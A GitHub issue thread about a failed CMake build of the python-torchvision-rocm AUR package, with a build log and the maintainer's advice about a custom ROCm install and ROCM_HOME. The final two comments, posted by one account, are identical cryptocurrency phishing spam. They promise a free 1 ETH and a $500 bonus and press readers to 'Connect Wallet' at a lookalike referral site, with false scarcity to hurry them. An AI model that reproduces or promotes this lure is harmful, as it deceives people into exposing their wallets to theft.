### ISSUE TITLE
python-torchvision-rocm CMAKE error

### ISSUE THREAD

**Issue by JosephDemarest** [wuxxin/aur-packages#3]
building for PYTORCH_ROCM_ARCH=gfx906;gfx908;gfx90a;gfx940;gfx941;gfx942;gfx1010;gfx1012;gfx1030;gfx1100;gfx1101;gfx1102
-- The C compiler identification is GNU 13.2.1
-- The CXX compiler identification is GNU 13.2.1
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /usr/bin/cc - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /usr/bin/c++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Caffe2: Found gflags with new-style gflags target.
-- Caffe2: Found glog with new-style glog target.
-- Found ZLIB: /usr/lib/libz.so (found version "1.3.1")
-- Caffe2: Found protobuf with new-style protobuf targets.
-- Caffe2: Protobuf version 25.3.0
Building PyTorch for GPU arch: gfx906;gfx908;gfx90a;gfx940;gfx941;gfx942;gfx1010;gfx1012;gfx1030;gfx1100;gfx1101;gfx1102
CMake Warning at /usr/lib/cmake/Caffe2/public/LoadHIP.cmake:36 (find_package):
  Could not find a configuration file for package "HIP" that is compatible
  with requested version "1.0".

  The following configuration files were considered but not accepted:

    /opt/rocm-6.0.2/lib/cmake/hip/hip-config.cmake, version: 6.0.24015

Call Stack (most recent call first):
  /usr/lib/cmake/Caffe2/public/LoadHIP.cmake:41 (find_package_and_print_version)
  /usr/lib/cmake/Caffe2/Caffe2Config.cmake:74 (include)
  /usr/lib/cmake/Torch/TorchConfig.cmake:68 (find_package)
  CMakeLists.txt:24 (find_package)

HIP VERSION: 
CMake Warning at /usr/lib/cmake/Torch/TorchConfig.cmake:22 (message):
  static library kineto_LIBRARY-NOTFOUND not found.
Call Stack (most recent call first):
  /usr/lib/cmake/Torch/TorchConfig.cmake:127 (append_torchlib_if_found)
  CMakeLists.txt:24 (find_package)

-- Found Torch: /usr/lib/libtorch.so
-- Found PNG: /usr/lib/libpng.so (found version "1.6.43")
-- Found JPEG: /usr/lib/libjpeg.so (found version "80")
-- Configuring done (0.4s)
CMake Error at /usr/lib/cmake/Caffe2/Caffe2Targets.cmake:107 (set_target_properties):
  The link interface of target "torch_hip_library" contains:

    roc::hipblas

  but the target was not found.  Possible reasons include:

    * There is a typo in the target name.
    * A find_package call is missing for an IMPORTED target.
    * An ALIAS target is missing.

Call Stack (most recent call first):
  /usr/lib/cmake/Caffe2/Caffe2Config.cmake:113 (include)
  /usr/lib/cmake/Torch/TorchConfig.cmake:68 (find_package)
  CMakeLists.txt:24 (find_package)

-- Generating done (0.0s)
CMake Generate step failed.  Build files cannot be regenerated correctly.
==> ERROR: A failure occurred in build().
    Aborting...
 -> error making: python-torchvision-rocm-exit status 4
 -> Failed to install the following packages. Manual intervention is required:
python-torchvision-rocm - exit status 4

**Comment by wuxxin** [comment]
> /opt/rocm-6.0.2/lib/cmake/hip/hip-config.cmake, version: 6.0.24015
it looks that you have a custom rocm stack under /opt/rocm-6.0.2,
which is not the one from the archlinux package which installs rocm under /opt/rocm.

if you want to try building with this custom stack,
set and export ROCM_HOME=/opt/rocm-6.0.2 before building.

**Comment by wuxxin** [comment]
gfx1032 is currently not in the list of supported gpu's,
i follow the build architecture list from arch:python-pytorch@2.2.2-3
maybe setting the build architecture to something similar could work. ymmmv.

**Comment by wuxxin** [comment]
i updated the package to 17.2, it builds on my machine, you could try to build it again, ymmv

**Comment by vty21** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!

**Comment by vty21** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
